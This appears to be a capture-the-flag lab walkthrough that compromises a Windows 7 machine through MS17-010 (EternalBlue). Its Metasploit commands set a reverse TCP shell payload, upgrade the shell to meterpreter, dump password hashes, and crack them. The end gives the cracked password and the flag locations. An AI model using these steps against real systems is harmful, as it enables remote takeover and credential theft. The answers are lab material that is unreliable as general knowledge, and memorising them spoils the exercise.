So start by deploying the machine waits for the IP address to get displayed.
TASK #1
let us put this <ip> address under nmap scan
root@kali# nmap -A <ip>


From this result we know it is running 3 ports under 1000 and it is using Microsoft windows 7 professional service pack 1


lets Scan with the vuln NSE scripts in Nmap to check weather these port and services are vulnerable or not.
root$kali> nmap --script vuln <ip> -vv

So, it says the port is vulnerable to smb-vuln-ms17-010

TASK #2
Now we know what is vulnerable and also we know the exploit
let's fire our Metasploit now and ATTACK!
root@kali> msfconsole


msf6> search ms17-010
msf6> use 2
msf6> options
msf6> set RHOST <target ip>
msf6> set LHOST <your ip>
// open new window and ifconfig and copy tun0 <your ip>
msf6> set payload windows/x64/shell/reverse_tcp
msf6> Exploit







TASK #3
Now you have the cmd window of the windows, escalate our privileges but before that, we need the command shell access on our meterpreter session for that we run this in the background. To do so use background command
C:\Windows\system32> background
Background session 1" [y/N] y
or u can use the shortcut ctrl+z and hit y and press enter
now your session is in the background to list the sessions use
msf6 exploit(windows/smb/ms17_010_eternalblue)> sessions
now to move this cmd session in our meterpreter session use command
>sessions -u 1
or u can use
>use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter)> set session 1
msf post(shell_to_meterpreter)> exploit

now use this session
sessions 2


Verify that we have escalated to NT AUTHORITY\SYSTEM.
Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'.
This should return that we are indeed a system.
Background this shell afterwards and select our meterpreter session for usage again.


TASK #4
Now you have complete control over the target machine
Within our elevated meterpreter shell, run the command
hashdump
This will dump all of the passwords on the machine as long as we have the correct
privileges to do so.
Now what you have is a hash which is a non-readable format of your password
So now we will use crackstation to crack that hash you can also use hashcat and any
other NTLM hash cracking tool.
so we copy the hash and crack the answer is - {alqfna22}
this completes your task 4

TASK #5
Now, all we need to do is wander inside the system at a different location to find the flag1/2/3 .txt
It took 5 min and I got all the flags at these locations
flag1 - C:\
flag2 - C:\Windows\System32\config
flag3- C:\Users\jon\Documents
Or you can also search all the flags at once by going into parent directory and run the command:
C:\>dir *falg*.txt /s

hooray all the flag has been found and we completed the machine
Comments